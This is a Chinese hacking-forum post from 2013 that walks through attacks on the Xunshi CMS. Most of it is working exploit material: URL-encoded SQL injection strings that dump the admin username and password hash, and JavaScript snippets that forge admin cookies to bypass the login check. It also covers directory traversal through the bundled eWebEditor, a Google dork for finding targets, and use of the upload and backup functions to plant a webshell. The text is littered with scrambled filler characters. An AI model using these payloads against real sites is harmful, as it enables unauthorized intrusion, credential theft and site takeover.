找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 讯时漏洞总结
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2376|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘6 G+ T, A9 M0 E. Q, [) N) k5 U1 m

" m1 H" O2 s! A$ \5 R在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)) ~$ Y1 e6 C$ d2 x. X
4 @) S0 w$ D3 L8 x6 V$ c  U
以下本文总结来自黑防去年第9期杂志上的内容...
6 T$ c+ E3 h2 D( \' ~. W& E3 I0 o0 o1 q' p; x' v% W* K
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
" X' y5 `* d, f# V* |
" I, S) U7 E/ V8 S& K( b26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
. Z% A, G, `5 H0 N
( J: K' U0 t7 N+ M: _记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
  r. ?( S5 Q: m6 Z$ g, E这里一个注入# d6 C- m, b& P4 T1 o3 W

. g+ \9 A6 a3 L  \6 M8 w) A效果如图:
8 c3 a- g$ a8 J* R$ L& O) }% r' H$ \2 |9 P# ~8 b/ O+ g& Z! k6 X
% Z0 I( M/ a5 p7 n; {4 ~
) A, m' T0 k. Z( x  C
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高., I2 A$ A3 ~9 x  ~  c* p; ?

# d9 w# N+ o7 E6 {4 @0 `+ K密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
4 k/ d8 H6 `7 o$ h- J% g
! E; i" T  U, S9 jjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));, ?# K, w: m0 s& O, _. l* \) }

/ o0 B  H9 D* O, m2 ?" Q7 U% S那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:- R2 |- h6 P, i% @3 B9 o, n
0 P+ u6 H% I, E" @
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
9 `0 [$ A% y1 E3 k1 c- W5 P- K. E: ~+ u0 X! X$ B0 a
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
- ^. V, I+ v! d3 V# t/ s- t8 d8 Q9 v. h9 r& b
访问这页面来列目录..步骤如下:1 \5 F; z" P1 n! C" ?" e) P6 ]5 f
, F# l, Q+ ]* \& C
javascript:alert(document.cookie="admindj=1")
: [" `$ J" f! R6 H7 P8 V) T3 ~6 Z7 d9 I2 U  j9 Q- k/ B0 L" l
http://www.political-security.co ... asp?id=46&dir=../../ |( i  M# q: H9 \( Y, H1 A% l0 Y9 R
- p# ]) [8 D) r3 Y6 F0 m2 r
效果如图:, I# B# R" U/ p( a

5 e  U2 Z# N+ K* I; i# z5 P8 C3 } " G3 q+ u/ Z+ B+ _) N
, W- X7 f+ d3 Q1 ^) Q# h
这样全站目录都能瞧了..找到后台目录..进去..
; n" Y5 W+ ~% D7 G6 G8 w8 q
( V5 f: w; r; t那么进了后台怎么拿shell??上传--备份就ok了..* n, U" O* W  E9 V6 J2 [4 G

5 f! K" e; j# i那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..! t# [" n9 ^8 \3 c& Q
$ H% a/ }9 @1 a, s7 c- A
这个我也碰到过一次..你都可以通过列目录来实现..2 `8 B& v% _: G2 D- H
' @% ]6 V- f1 w# b9 v
javascript:alert(document.cookie="admindj=1") / {) c7 t4 y  |2 Y( g

( q1 Q( s! h$ L) h" U; Uhttp://www.political-security.co ... p?action=BackupData
9 w! e; V% Z  B# O  T+ I" F: Z1 {1 i9 c* S5 ^7 b1 u
备份ok..* v' q3 o$ m! m; j

& z# U% b# e+ u那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
8 j- c  l/ u! H: H1 j, G5 Y* z2 {0 Q. j
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下1 I/ o% u! P2 ?. U2 Q. [
8 _3 G* D. L1 Y/ v" I" D. h
然后访问此页面进行注入..步骤如下:
0 f0 N. w9 F4 }- k- k: F* k! S$ y+ Y5 {; V: ?' O1 C$ y
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
) v6 g. Y' _2 g5 B" _; K9 |& X$ V0 `( o5 Z+ R
然后请求admin/admin_chk.asp页面0 c( g' \( z9 J  I
& H7 [7 i. f- P+ |  _
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%- ~% m% L9 A; C5 m0 v. v7 M

! V- \- u5 D2 b, u5 g26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
0 A6 o* Y4 A% x- H; p
6 u, K8 f% _$ K) N3 K! \  ^效果如图所示:- D3 \/ J( A: s: z
; v; ?5 ]/ L3 B

8 ^: J7 a: O5 D+ m# s& ~/ _' p+ W8 Y! \
讯时漏洞2, H; s. c7 A# D) l* o4 G9 {
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)3 O0 Y$ }! P1 u6 x

. u; J: S, b' k1、/admin/admin_news_pl_view.asp?id=1! A! o- D; V  Q4 d) s7 T
//id任意 填入以下语句& K& n) z" D2 Z7 Q4 s' B

  N7 X8 w  a% E; ~2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
: P6 q$ a5 k6 A$ x, d/ A$ O . i% O  x( o( p2 Q1 E6 i
5 H3 ]' M! @1 \/ d6 c* o" M; }; k
0 j- i9 K  \8 ?" K. z" R6 D
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='+ t6 r% s, o) ?% L; A: i! S
% B/ A% \! q1 Q% N% L% u8 o
6 R, T/ l2 f5 G: u4 a0 {) [
- i+ f0 p7 U" L8 j7 |* [' a
爆出管理员帐号和密码了  H# c  l; o* R! h
: k; A! @4 X+ ]- P! P0 W8 v
: o/ t9 U- [! K! J7 G! V% c
  t, m% G, y6 V$ U. S+ T
4、cookies进后台
+ n& N/ Y+ b4 a1 y9 r3 N0 l" \ 3 v* t0 t. Z  ~8 M1 a
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));2 ~6 d) V+ K4 K% ^" H

1 ~) H+ h& z6 p4 N  ^. L7 a
. Q# n! R6 w3 b8 F: E, Q# C& z, k1 [: C8 z
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
$ \. }; k8 m3 g8 \, Y 0 M- V7 U8 s+ ^3 U# x/ D% e7 {
% F8 H/ g. T. B: x4 d2 D

6 L) C0 C! r1 u; R9 @5 C& U6、后台有上传和备份取SHELL不难。
) t9 _$ W/ y) {( @( ^ & P& _/ b1 H# G1 C! c5 R
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
, q6 h% \$ O) Q) O; J* a
& {& J  p( a7 ]6 P2 R逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!8 U9 ~! B; L" R6 R( ]' h) @9 v# _7 K
2 S) F2 H3 a  h. n) _

& g2 w: O8 ], I6 p, z
. c0 C% z' y. u0 B
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表